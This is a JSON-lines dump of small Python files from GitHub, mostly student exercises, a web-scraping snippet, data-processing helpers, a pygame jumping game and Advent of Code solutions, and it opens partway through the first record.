\"10Kg\"\n amt = True\n else : \n print(\"Pilihan yang anda masukkan salah.\")\n print(\"Coba lagi!\")\n amt = False\nfinalState = False\nwhile finalState == False:\n print(\"\\nRincian belanja: \")\n print(\"Beras : \" + bname )\n print(\"Paket : \" + pak)\n print(\"Total : Rp\" + str(tot)+\"\\n\")\n print (\"Pilih metode pembayaran : \")\n print(\"1. Tunai\")\n print(\"2. E-money \")\n mp = int(input(\"(1/2) : \"))\n if mp == 1:\n kembali = 0\n cash = 0\n while cash < tot:\n cash = int(input(\"Masukkan jumlah uang: Rp.\"))\n kembali = cash - tot \n if cash < tot:\n print(\"Mohon maaf, jumlah uang anda tidak mencukupi\")\n else : finalState = True\n eMoney = False\n elif mp == 2:\n cash = input(\"Masukkan nomor e-money: \")\n eMoney = True\n finalState = True\n else :\n print(\"Pilihan anda salah. Coba lagi!\")\n finalState = False\n\nprint(\"Transaksi berhasil!\")\nprint(\"Rincian belanja: \")\nprint(\"Beras : \" + bname )\nprint(\"Paket : \" + pak)\nprint(\"Total : Rp\" + str(tot)+\"\\n\")\nif eMoney == True:\n sald = 2504000 - tot\n print (\"Sisa saldo anda : Rp.\" + str(sald))\nelse :\n print(\"Bayar : Rp\" + str(cash))\n print(\"Kembali : Rp \" + str(kembali))\n","repo_name":"Rizqirazkafi/kuliah-y2","sub_path":"TBO/vmBeras.py","file_name":"vmBeras.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"43494956383","text":"import requests\nfrom bs4 import BeautifulSoup\n\nurl = 'https://hogangnono.com/search?q=%EA%B2%BD%EA%B8%B0%EB%8F%84%20%EA%B9%80%ED%8F%AC%EC%8B%9C%20%ED%92%8D%EB%AC%B4%EB%8F%99'\nres = requests.get(url)\nres.raise_for_status()\n\nsoup = BeautifulSoup(res.text, 'lxml')\n\n# 해당지역 단지 목록 가져오기\narea_list = soup.find_all('li', attrs={'class', 'apt'})\nprint(area_list)","repo_name":"simbyungki/web_scraping","sub_path":"practice01/bs4_pungmu_hogangnono.py","file_name":"bs4_pungmu_hogangnono.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"17042922181","text":"from datetime import date\nano = int(input('Em que ano você nasceu? '))\nhoje = date.today().year\nidade = hoje-ano-1\n\nprint('Você tem {} anos e sua categoria é '.format(idade),end=\"\")\n\nif idade <= 9:\n print('\\033[36mMirim')\nelif idade <= 14:\n print('\\033[32mInfantil')\nelif idade <= 19:\n print('\\033[34mJunior')\nelif idade <= 25:\n print('\\033[035mSênior')\nelif idade > 25:\n print('\\033[31mMaster')\n","repo_name":"Joaoespindola1/Python-aprendizado","sub_path":"Desafios/ex041.py","file_name":"ex041.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"71376751935","text":"import pandas as pd\n\n'''\nObject to preprocess data\n'''\n\ndef read_in_dataset(dataset, data_folder='raw', data_type='csv', verbose=False):\n '''\n Read in dataset (csv format) to pandas dataframe\n\n Keyword Arguments:\n ------------------\n * dataset - string with dataset filename\n * data_folder - string with either raw or processed\n * verbose - True will print intormation about the dataset\n\n Returns:\n --------\n a pandas dataframe\n '''\n if data_type == 'csv':\n df = pd.read_csv('../data/{}/{}'.format(data_folder, dataset))\n elif data_type == 'excel':\n df = pd.read_excel('../data/{}/{}'.format(data_folder, dataset))\n\n if verbose:\n print('\\n{0:-^80}'.format(' Reading in the following dataset: {0}'.format(dataset)))\n print(\"\\n Shape: {0} rows and {1} columns\".format(*df.shape))\n print('\\n{0:-^80}\\n'.format(' It has the following columns '))\n print(df.columns)\n print('\\n{0:-^80}\\n'.format(' The first 5 rows look like this '))\n print(df.head())\n\n return df\n\n\ndef get_num_of_levels(series, sep='>', verbose=False):\n '''\n Get maximum number of category levels\n '''\n max_num_levels = series.str.split(sep).apply(len).max()\n\n if verbose:\n print(\"Max Number of Category Levels: {}\".format(max_num_levels))\n\n return max_num_levels\n\n\ndef flatten_categories(category_series, df=None, drop_col=None, sep='>'):\n '''\n Take in Series with categories in string format and flatten into columns\n\n Keyword Arguments:\n ------------------\n * category_series - series with string of categories\n * df - pandas dataframe\n * drop_col - name of column with nested categories (string)\n * sep - puncuation that separates categories\n\n\n Returns:\n --------\n a pandas dataframe\n '''\n\n num_levels = get_num_of_levels(category_series, sep=sep)\n\n col_labels = ['L' + str(i) for i in range(1, num_levels+1)]\n\n\n category_levels = pd.DataFrame(category_series.str.split(sep).values.tolist(), columns=col_labels)\n category_levels.fillna(value=pd.np.nan, inplace=True)\n\n if df is not None:\n merged_df = pd.merge(df,category_levels, left_index=True, right_index=True).drop(drop_col, axis=1)\n\n return merged_df\n else:\n return category_levels\n\n\ndef search_cons_status(cons_searches, raw_searches):\n '''\n Get status on number of unique search terms\n '''\n\n num_searches = len(raw_searches)\n new_num_searches = len(set(cons_searches))\n\n num_cons = num_searches - new_num_searches\n\n per_reduction = round((num_cons/num_searches)*100,1)\n\n print(f'New Number of Searches: {new_num_searches}')\n print(f'Number of Consolidated Searches: {num_cons}')\n print(f'Percent Reduction: {per_reduction}%')\n","repo_name":"jaime-garvey/hd-decor-case","sub_path":"modules/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"14585690640","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"Unit tests for meaning.py\"\"\"\n\nimport meaning\nimport unittest\n\nclass KnownValues(unittest.TestCase):\n\n knownParserValues = (\n (\"*German: [[wichtig]]\",\n [('de','wichtig','',1,False,'')]\n ),\n (\"*[[Esperanto]]: [[grava]]\",\n [('eo','grava','',1,False,'')]\n ),\n (\"*{{fr}}: [[importante]] {{f}}\",\n [('fr','importante','f',1,False,'')]\n ),\n (\"*Dutch: [[voorbeelden]] ''n, pl'', [[instructies]] {{f}}, {{p}}\",\n [('nl','voorbeelden','n',2,False,''),\n ('nl','instructies', 'f',2,False,'')]\n ),\n (\"*Russian: [[шесток]] ''m'' (shestok)\",\n [('ru','шесток','m',1,False,'shestok')]\n ),\n (\"*Kazakh: сәлем, салам, сәлеметсіздер(respectable)\",\n [('ka','сәлем','',1,False,''),\n ('ka','салам','',1,False,''),\n ('ka','сәлеметсіздер','',1,False,'respectable')]\n ),\n (\"*Chinese(Mandarin):[[你好]](ni3 hao3), [[您好]](''formal'' nin2 hao3)\",\n [('zh','你好','',1,False,'ni3 hao3'),\n ('zh','您好','',1,False,\"''formal'' nin2 hao3\")]\n ),\n (\"*German: [[Lamm]] ''n'' [[:de:Lamm|(de)]]\",\n [('de','Lamm','n',1,False,'')]\n ),\n (\"*Italian: [[pronto#Italian|pronto]]\",\n [('it','pronto','',1,False,'')]\n ),\n )\n\n def testParser(self):\n '''self.term, self.gender, self.number, self.diminutive and remark parsed correctly from Wiki format'''\n for wikiline, results in self.knownParserValues:\n ameaning = meaning.Meaning('en', 'dummy')\n ameaning.parseTranslations(wikiline)\n i=0\n for termlang, thisterm, termgender, termnumber, termisadiminutive, remark in results:\n resultterm = ameaning.translations[termlang]['alltrans'][i]['trans']\n self.assertEqual(resultterm.getTerm(), thisterm)\n self.assertEqual(resultterm.getGender(), termgender)\n self.assertEqual(resultterm.getNumber(), termnumber)\n# self.assertEqual(resultterm.getIsDiminutive(), termisadiminutive)\n self.assertEqual(ameaning.translations[termlang]['alltrans'][i]['remark'], remark)\n i+=1\n\nif __name__ == \"__main__\":\n unittest.main()\n \n","repo_name":"dantman/pywikia","sub_path":"wiktionary/meaningtest.py","file_name":"meaningtest.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"79"}
+{"seq_id":"72659735615","text":"from Stack import *\n\nclass MyQueue:\n\tdef __init__(self):\n\t\tself.first = None\n\t\tself.last = None\n\t\tself.size = 0\n\t\tself.addItemStack = MyStack()\n\t\tself.removeItemStack = MyStack()\n\t\n\tdef add(self, item):\n\t\tself.addItemStack.push(item)\n\t\tself.size += 1\n\t\tself.last = item\n\n\t\tif self.size == 1:\n\t\t\tself.first = self.last\n\n\n\tdef remove(self):\n\t\t#This is when the first value in queue will change after remove action\n\t\ttopItem = self.peek()\n\t\tself.removeItemStack.pop()\n\t\tself.size -= 1\n\n\t\t#update self.first\n\t\tself.first = self.peek()\n\t\tif self.size <= 1:\n\t\t\tself.last = self.first\n\n\t\treturn topItem\n\n\tdef isEmpty(self):\n\t\treturn True if self.size == 0 else False\n\t\n\tdef peek(self):\n\t\tif self.removeItemStack.isEmpty():\n\t\t\tif self.addItemStack.isEmpty():\n\t\t\t\treturn None\n\t\t\telse:\n\t\t\t\t#pop all the items from addItemStack, push all the items to removeItemStack\n\t\t\t\twhile not self.addItemStack.isEmpty():\n\t\t\t\t\tpopItem = self.addItemStack.pop()\n\t\t\t\t\tself.removeItemStack.push(popItem)\n\n\t\t\t\ttopItem = self.removeItemStack.top\n\t\t\t\treturn topItem\n\t\telse:\n\t\t\ttopItem = self.removeItemStack.top\n\t\t\treturn topItem\n\nif __name__ == \"__main__\":\n\tqstack = MyQueue()\n\tfor i in range(1, 6):\n\t\tqstack.add(i)\n\t\n\tprint(\"first: \", qstack.first)\n\tprint(\"last: \", qstack.last)\n\tprint(\"peek: \", qstack.peek())\n\t\n\tprint(\"remove item: \", qstack.remove())\n\n\tprint(\"first: \", qstack.first)\n\tprint(\"peek: \", qstack.peek())\n\tprint(\"last: \", qstack.last)\n\n\twhile not qstack.isEmpty():\n\t\tprint(qstack.remove())\n\n\tprint(\"after queue is empty: \")\n\tprint(\"first: \", qstack.first)\n\tprint(\"last: \", qstack.last)\n\n\n","repo_name":"becca6223/Tech_Prep","sub_path":"stack_and_queues/QueueViaStacks.py","file_name":"QueueViaStacks.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"38581980904","text":"#!/usr/bin/env python\n\n\"\"\"Interpolate missing values, preserving some amount of variance.\n\nUsage: {PROG} -f field -x field [ input ]\n\n-x field - x axis column (required)\n-f field - y axis column (field to be interpolated - required)\n\nIf given, the input file is used, otherwise sys.stdin. Output is always to\nsys.stdout.\n\nCurrently, all this does is linear interpolation. Variance-preserving\ninterpolation is TBD.\n\n\"\"\"\n\nimport getopt\nimport os\nimport sys\n\nimport numpy as np\nimport pandas as pd\n\nPROG = os.path.split(sys.argv[0])[1]\n\ndef usage(msg=None):\n \"help user\"\n if msg is not None:\n printe(msg)\n printe()\n printe(__doc__.strip().format(**globals()))\n\ndef main():\n \"see __doc__\"\n opts, args = getopt.getopt(sys.argv[1:], \"hf:x:\",\n [\"help\", \"field=\", \"xaxis=\",])\n x_axis = None\n field = None\n for opt, arg in opts:\n if opt in (\"--help\", \"-h\"):\n usage()\n return 0\n if opt in (\"-f\", \"--field\"):\n field = arg\n elif opt in (\"-x\", \"--xaxis\"):\n x_axis = arg\n if field is None or x_axis is None:\n usage(\"-x and -f are both required.\")\n return 1\n\n infile = open(args[0]) if args else sys.stdin\n header = next(infile).strip().split(\",\")\n dtype = {\n field: np.float,\n }\n for col in header:\n if col not in (x_axis, field):\n dtype[col] = str\n frame = pd.read_csv(infile, dtype=dtype, names=header,\n parse_dates=[x_axis])\n frame.index = frame[x_axis]\n field_data = frame[[field]]\n field_data = field_data.resample(\"D\").mean().interpolate()\n del frame[field]\n frame = field_data.join(frame, how=\"outer\")\n del frame[x_axis]\n frame = frame.reset_index()\n frame = frame.replace(np.nan, \"\")\n frame.to_csv(sys.stdout, index=False)\n return 0\n\ndef printe(*args, file=sys.stderr, **kwds):\n \"print, defaultint to stderr for output\"\n return print(*args, file=file, **kwds)\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"smontanaro/csvprogs","sub_path":"csvprogs/src/interp.py","file_name":"interp.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"5195632322","text":"quizzes = [\n    ['Question 1', ['Ans 1', 'Ans 2', 'Ans 3', 'Ans 4']],\n    ['Question 2', ['Ans 1', 'Ans 2', 'Ans 3', 'Ans 4']],\n    ['Question 3', ['Ans 1', 'Ans 2', 'Ans 3', 'Ans 4']],\n    ['Question 4', ['Ans 1', 'Ans 2', 'Ans 3', 'Ans 4']],\n    ['Question 5', ['Ans 1', 'Ans 2', 'Ans 3', 'Ans 4']],\n]\n\nanswers = [1, 2, 2, 3, 4]\n\ndef calculate_score(user_ans):\n    score = 0\n    for i in range(len(user_ans)):\n        if user_ans[i] == answers[i]:\n            score += 1\n    return score\n\ndef prompt_quiz(quiz):\n    print('-'*40)\n    print(quiz[0])\n    print()\n    for i in range(4):\n        print('[' + str(i + 1) + '] ' + quiz[1][i])\n    print()\n    print('-'*40)\n\ndef play():\n    user_ans = []\n    for i in range(len(quizzes)):\n        prompt_quiz(quizzes[i])\n        ans = 0\n        while ans < 1 or ans > 4:\n            try:\n                ans = int(input('Your answer: '))\n            except ValueError:\n                pass\n        user_ans.append(ans)\n    score = calculate_score(user_ans)\n    print('Your score is ' + str(score))\n\ndef main():\n    while True:\n        play()\n        answer = input('Play again? (y/n): ')\n        if answer != 'y':\n            break\nmain()","repo_name":"sorasora46/oreo-piethon","sub_path":"mini_projects/quiz_game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
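The retry loop in play() is a common input-validation pattern; factored into a small reusable helper it might look like this (the ask_int name is made up):

def ask_int(prompt, low, high):
    # Keep asking until the user types an integer in [low, high].
    while True:
        try:
            value = int(input(prompt))
        except ValueError:
            continue
        if low <= value <= high:
            return value

# e.g. ans = ask_int('Your answer: ', 1, 4)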
+{"seq_id":"6950905578","text":"import sys\ninput = sys.stdin.readline\nsys.setrecursionlimit(10 ** 6)  # grids up to N*M cells can recurse deeply\n\nN, M = map(int, input().split())\ngrid = []\n\ndx = [-1, 0, 1, 0]\ndy = [0, -1, 0, 1]\n\nfor i in range(N):\n    temp = list(input().rstrip(\"\\n\"))\n    a = []\n    for j in temp:\n        a.append(int(j))\n    grid.append(a)\n\n\ndef DFS(x, y, grid, visited, N, M):\n    for i in range(4):\n        nx = x + dx[i]\n        ny = y + dy[i]\n\n        if 0 <= nx < N and 0 <= ny < M and not visited[nx][ny] and grid[nx][ny] == 0:\n            visited[nx][ny] = True\n            DFS(nx, ny, grid, visited, N, M)\n\n\nvisited = [[False for _ in range(M)] for _ in range(N)]\nanswer = 0\nfor i in range(N):\n    for j in range(M):\n        if grid[i][j] == 0 and not visited[i][j]:\n            answer += 1\n            visited[i][j] = True\n            DFS(i, j, grid, visited, N, M)\n\nprint(answer)\n","repo_name":"TypingOK/algorithm_study","sub_path":"이것이 취업을 위한 코딩테스트다/음료수 얼려 먹기.py","file_name":"음료수 얼려 먹기.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
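On very large grids even a raised recursion limit can be fragile; the same flood fill can be written iteratively with an explicit stack, as a standalone sketch:

def count_regions(grid):
    n, m = len(grid), len(grid[0])
    visited = [[False] * m for _ in range(n)]
    answer = 0
    for si in range(n):
        for sj in range(m):
            if grid[si][sj] != 0 or visited[si][sj]:
                continue
            answer += 1                 # found a new connected region of 0s
            stack = [(si, sj)]
            visited[si][sj] = True
            while stack:
                x, y = stack.pop()
                for dx, dy in ((-1, 0), (0, -1), (1, 0), (0, 1)):
                    nx, ny = x + dx, y + dy
                    if 0 <= nx < n and 0 <= ny < m and not visited[nx][ny] and grid[nx][ny] == 0:
                        visited[nx][ny] = True
                        stack.append((nx, ny))
    return answer

# e.g. count_regions([[0, 0, 1], [1, 0, 1], [1, 1, 0]]) == 2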
+{"seq_id":"34477896247","text":"from shutil import copyfile\nimport os\n\n\ndef create_directory(dir_name):\n try:\n os.makedirs(dir_name)\n except OSError:\n if not os.path.isdir(dir_name):\n raise\n\n\ndef read_compile(lines, file):\n with open(file) as problem1_file:\n append_lines = [line for line in problem1_file]\n append_lines = append_lines[2:]\n\n # Generate submission file for Problem1.py\n with open('submission/%s' % file, 'w') as combined_file:\n [combined_file.write(line) for line in lines]\n [combined_file.write(append_line) for append_line in append_lines]\n\n\nif __name__ == '__main__':\n create_directory('submission')\n\n # Combine decryptRC4 with Problem1 and Problem2\n with open('decryptRC4.py') as main_file:\n lines = [line for line in main_file]\n\n # remove lines after \"\"if __name__ == '__main__':\"\"\n lines = lines[:177]\n\n read_compile(lines, 'Problem1.py')\n read_compile(lines, 'Problem2.py')\n\n # Copy the generated results\n copyfile(\"Problem1.txt\", \"submission/Problem1.txt\")\n copyfile(\"Problem2.txt\", \"submission/Problem2.txt\")\n","repo_name":"Andyccs/CZ4024AttackRC4","sub_path":"generate_submission.py","file_name":"generate_submission.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"71856164416","text":"import random\r\nimport pygame.display\r\nimport pygame.font\r\nimport pygame.image\r\nimport pygame.mixer\r\nimport pygame.sprite\r\nfrom sprites import *\r\n\r\n\r\nclass Game:\r\n def __init__(self):\r\n # initialize game window, etc.\r\n pyg.init()\r\n pyg.mixer.init()\r\n self.screen = pyg.display.set_mode((WIDTH, HEIGHT))\r\n pyg.display.set_caption(TITTLE)\r\n self.clock = pyg.time.Clock()\r\n self.running = True\r\n self.font_name_1 = pyg.font.match_font(\"verdana\")\r\n self.font_name_2 = pyg.font.match_font(\"georgia\")\r\n self.load_data()\r\n\r\n def load_data(self):\r\n self.dir = path.dirname(__file__)\r\n self.img_dir = path.join(self.dir, \"Jumper_Data\")\r\n with open(path.join(self.dir, HS_FILE), \"r\") as f:\r\n try:\r\n self.highscore = int(f.read())\r\n except:\r\n self.highscore = 0\r\n\r\n # load spritesheet image\r\n self.spritesheet = Spritesheet(path.join(self.img_dir, SPRITESHEET))\r\n\r\n # Cloud images\r\n self.cloud_images = []\r\n for i in range(1, 4):\r\n self.cloud_images.append(pyg.image.load(path.join(self.img_dir, f\"cloud{i}.png\".format(i))).convert())\r\n\r\n # load sound\r\n self.snd_dir = path.join(self.dir, \"Game_Sound\")\r\n self.jump_sound = pygame.mixer.Sound(path.join(self.snd_dir, 'Jump10.wav'))\r\n self.boost_sound = pygame.mixer.Sound(path.join(self.snd_dir, 'Powerup7.wav'))\r\n\r\n\r\n\r\n def new(self):\r\n # Starts a new game\r\n self.score = 0\r\n self.all_sprites = pyg.sprite.Group()\r\n self.platforms = pyg.sprite.Group()\r\n self.powerups = pyg.sprite.Group()\r\n self.mobs = pyg.sprite.Group()\r\n self.clouds = pyg.sprite.Group()\r\n self.mob = Mob(self)\r\n self.player = Player(self)\r\n for plat in PLAYER_LIST:\r\n Platform(self, *plat)\r\n self.mob_timer = 0\r\n pyg.mixer.music.load(path.join(self.snd_dir, 'Happy Tune.wav'))\r\n self.run()\r\n\r\n def run(self):\r\n # Game loop\r\n pyg.mixer.music.play(loops = -1)\r\n self.playing = True\r\n while self.playing:\r\n # this confirms that the loop have completed under 0.03 second\r\n # And if it had completed before 0.3 second then it will wait till the times up and then run next loop\r\n # so that it will run at the same speed\r\n self.clock.tick(FPS)\r\n # Processing input (events)\r\n self.events()\r\n # To update the sprites after meeting a certain condition\r\n self.update()\r\n # Draw / Render\r\n self.draw()\r\n pyg.mixer.music.fadeout(500)\r\n\r\n def update(self):\r\n # Game loop - update\r\n # To update the sprites after meeting a certain condition in the next frame\r\n self.all_sprites.update()\r\n\r\n # spqwn a mob\r\n now = pyg.time.get_ticks()\r\n if now - self.mob_timer > 10000 + random.choice([-1000, -500, 0, 500, 1000]):\r\n self.mob_timer = now\r\n Mob(self)\r\n\r\n # hit mobs?\r\n # If hit mobs game will end\r\n # For pixel perfect collision we are using pygame_mask function\r\n mob_hits = pyg.sprite.spritecollide(self.player, self.mobs, False, pyg.sprite.collide_mask)\r\n if mob_hits:\r\n self.playing = False\r\n\r\n # check if player hits a platform - only if falling\r\n if self.player.vel.y > 0:\r\n hits = pyg.sprite.spritecollide(self.player, self.platforms, False)\r\n if hits:\r\n lowest_plat = hits[0]\r\n # Collecting the lowest platform in the collision.\r\n # If collision is happening with more than one platform\r\n for hit in hits:\r\n if hit.rect.bottom > lowest_plat.rect.bottom:\r\n lowest_plat = hit\r\n\r\n # Checking whether the player are out of the platform or not\r\n if self.player.pos.x < lowest_plat.rect.right + 7 
and \\\r\n self.player.pos.x > lowest_plat.rect.left - 7:\r\n # If the player feet get on the platform ony then he can land on it\r\n if self.player.pos.y < lowest_plat.rect.centery:\r\n self.player.pos.y = hits[0].rect.top\r\n self.player.vel.y = 0\r\n self.player.jumping = False\r\n\r\n # if player reaches top 1/4 of the screen\r\n if self.player.rect.top <= HEIGHT / 4:\r\n if random.randrange(100)<15:\r\n Cloud(self)\r\n self.player.pos.y += max(abs(self.player.vel.y), 2)\r\n for cloud in self.clouds:\r\n cloud.rect.y += max(abs(self.player.vel.y/2), 2)\r\n for mob in self.mobs:\r\n mob.rect.y += max(abs(self.player.vel.y), 2)\r\n for plat in self.platforms:\r\n plat.rect.y += max(abs(self.player.vel.y), 2)\r\n if plat.rect.top >= HEIGHT:\r\n plat.kill()\r\n self.score += 10\r\n\r\n # If a player hits a powerup\r\n pow_hits = pyg.sprite.spritecollide(self.player, self.powerups, True)\r\n for powerup in pow_hits:\r\n if powerup.type == 'boost':\r\n self.boost_sound.play()\r\n self.player.vel.y = - BOOST_POWER\r\n self.player.jumping = False\r\n\r\n\r\n # If player hits bottom of the screen (Die!)\r\n if self.player.rect.bottom > HEIGHT:\r\n for sprite in self.all_sprites:\r\n sprite.rect.y -= max(self.player.vel.y, 10)\r\n if sprite.rect.bottom < 0:\r\n sprite.kill()\r\n if len(self.platforms) == 0:\r\n self.playing = False\r\n\r\n\r\n # Spawn new platform to keep same average number\r\n while len(self.platforms) < 6:\r\n width = random.randint(50, 150)\r\n x = random.randint(0, WIDTH-width)\r\n y = random.randint(-75, -30)\r\n p = Platform(self, x, y)\r\n self.platforms.add(p)\r\n self.all_sprites.add(p)\r\n\r\n\r\n def events(self):\r\n # Game loop - events\r\n # Processing input (events)\r\n for event in pyg.event.get():\r\n # Check for closing window\r\n if event.type == pyg.QUIT:\r\n if self.playing:\r\n self.playing = False\r\n self.running = False\r\n if event.type == pyg.KEYDOWN:\r\n if event.key == pyg.K_SPACE:\r\n self.player.jump()\r\n\r\n if event.type == pyg.KEYUP:\r\n if event.key == pyg.K_SPACE:\r\n self.player.jump_cut()\r\n\r\n\r\n def draw(self):\r\n # Game loop - draw\r\n # To drawing updated frame on the screen\r\n self.screen.fill(BGCOLOR)\r\n # To draw all the updated sprites\r\n self.all_sprites.draw(self.screen)\r\n self.screen.blit(self.player.image, self.player.rect)\r\n self.screen.blit(self.mob.image, self.mob.rect)\r\n self.draw_text((f\"Score: {self.score}\"), self.font_name_2, 23, color[\"white\"], 60, 15)\r\n if self.score > self.highscore:\r\n self.draw_text(f\"High Score: {self.score}\", self.font_name_2, 23, color[\"white\"], WIDTH - 90, 15)\r\n else :\r\n self.draw_text(f\"High Score: {self.highscore}\", self.font_name_2, 23, color[\"white\"], WIDTH-90, 15)\r\n # After drawing everything flip the display\r\n pyg.display.flip()\r\n\r\n def show_start_screen(self):\r\n # Game splash / Start screen\r\n self.background(\"splash.jpeg\")\r\n\r\n # Initializing game start music\r\n pyg.mixer.music.load(path.join(self.snd_dir, 'Yippee.wav'))\r\n pyg.mixer.music.play(loops = -1)\r\n\r\n #self.screen.fill(BGCOLOR)\r\n self.draw_text(TITTLE, self.font_name_2, 55, color[\"white\"], WIDTH/2, HEIGHT/4)\r\n self.draw_text(\"Arrows to move Space to jump\", self.font_name_2, 25, color[\"white\"], WIDTH/2, HEIGHT/2)\r\n self.draw_text(\"Press any key to play\", self.font_name_2, 25, color[\"black\"], WIDTH/2, HEIGHT*3/4+30)\r\n self.draw_text(f\"High Score: {self.highscore}\", self.font_name_2, 25, color[\"white\"], WIDTH/2, 15)\r\n pyg.display.flip()\r\n 
self.wait_for_key()\r\n        pyg.mixer.music.fadeout(500)\r\n\r\n    def background(self, image):\r\n        # Changing the start/end screen background\r\n        self.image = path.join(self.img_dir, image)\r\n        bg = pygame.image.load(self.image)\r\n        bg = pyg.transform.scale(bg, (WIDTH, HEIGHT))\r\n        self.screen.blit(bg, (0, 0))\r\n\r\n    def show_go_screen(self):\r\n        # Game over / Continue screen\r\n        if not self.running:\r\n            return\r\n\r\n        # Initializing game ending music\r\n        pyg.mixer.music.load(path.join(self.snd_dir, 'prologue.mp3'))\r\n        pyg.mixer.music.play(loops=-1)\r\n        self.background(\"end.jpeg\")\r\n        #self.screen.fill(BGCOLOR)\r\n        self.draw_text(\"GAME OVER\", self.font_name_2, 60, color[\"white\"], WIDTH / 2, HEIGHT / 4)\r\n        self.draw_text(f\"Your Score: {self.score}\", self.font_name_2, 25, color[\"white\"], WIDTH / 2, HEIGHT / 2)\r\n        self.draw_text(\"Press any key to play again\", self.font_name_2, 25, color[\"white\"], WIDTH / 2, HEIGHT * 3 / 4 + 30)\r\n        if self.score > self.highscore:\r\n            self.highscore = self.score\r\n            self.draw_text(\"NEW HIGH SCORE!\", self.font_name_2, 25, color[\"red\"], WIDTH / 2, HEIGHT / 2 + 40)\r\n            with open(path.join(self.dir, HS_FILE), \"w\") as f:\r\n                f.write(str(self.score))\r\n        else:\r\n            self.draw_text(f\"High Score: {self.highscore} \", self.font_name_2, 25, color[\"red\"], WIDTH / 2, HEIGHT / 2 + 40)\r\n\r\n        pyg.display.flip()\r\n        self.wait_for_key()\r\n        pyg.mixer.music.fadeout(500)\r\n\r\n    def wait_for_key(self):\r\n        waiting = True\r\n        while waiting:\r\n            self.clock.tick(FPS)\r\n            for event in pyg.event.get():\r\n                if event.type == pyg.QUIT:\r\n                    waiting = False\r\n                    self.running = False\r\n                if event.type == pyg.KEYUP:\r\n                    waiting = False\r\n\r\n    def draw_text(self, text, font_style, size, color, x, y):\r\n        font = pygame.font.Font(font_style, size)\r\n        text_surface = font.render(text, True, color)\r\n        text_rect = text_surface.get_rect()\r\n        text_rect.midtop = (x, y)\r\n        self.screen.blit(text_surface, text_rect)\r\n\r\nif __name__ == \"__main__\":\r\n    g = Game()\r\n    g.show_start_screen()\r\n    while g.running:\r\n        g.new()\r\n        g.show_go_screen()\r\n\r\n    pyg.quit()\r\n","repo_name":"Ronak-kumar/Jumper-Game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"6700695229","text":"import sys\nfrom collections import defaultdict\nimport re\n\ndef initialise():\n with open(sys.argv[1]) as file:\n data = file.readlines()\n\n cuboids = []\n\n for line in data:\n op = line.split(' ')[0]\n ranges = ''.join(line.split(' ')[1:])\n values = [int(x) for x in re.findall(r'-{0,1}\\d{1,10}', ranges)]\n cuboids.append((op, tuple(values)))\n\n return cuboids\n\n\n\ndef apply_cuboids_to_point(coords, cuboids):\n x,y,z = coords\n\n result = False\n\n for cuboid in cuboids:\n op = cuboid[0]\n xmin, xmax, ymin, ymax, zmin, zmax = cuboid[1]\n\n if xmin <= x <= xmax and ymin <= y <= ymax and zmin <= z <= zmax:\n if op == 'on':\n result = True\n else:\n result = False\n \n return result\n\ndef iterate_over_points(cuboids):\n count=0\n \n bigcube = range(-50,51)\n\n for x in bigcube:\n for y in bigcube:\n for z in bigcube:\n if apply_cuboids_to_point((x,y,z), cuboids):\n count += 1\n\n return count\n\ncuboids = initialise()\n\nprint(cuboids)\n\nanswer = iterate_over_points(cuboids)\n\nprint(answer)\n\n\n","repo_name":"DavidBartram/advent-of-code","sub_path":"2021/day22-1.py","file_name":"day22-1.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
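An alternative sketch for the same part-1 count that iterates over cuboids instead of over every point, clamping each cuboid to the -50..50 region (same (op, (x0, x1, y0, y1, z0, z1)) layout as above):

def count_on(cuboids):
    on = set()
    for op, (x0, x1, y0, y1, z0, z1) in cuboids:
        # Clamp to the initialization region; empty ranges just contribute nothing.
        xs = range(max(x0, -50), min(x1, 50) + 1)
        ys = range(max(y0, -50), min(y1, 50) + 1)
        zs = range(max(z0, -50), min(z1, 50) + 1)
        points = {(x, y, z) for x in xs for y in ys for z in zs}
        on = on | points if op == 'on' else on - points
    return len(on)

This touches only cells covered by some cuboid, which is usually far fewer than the full 101**3 grid.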
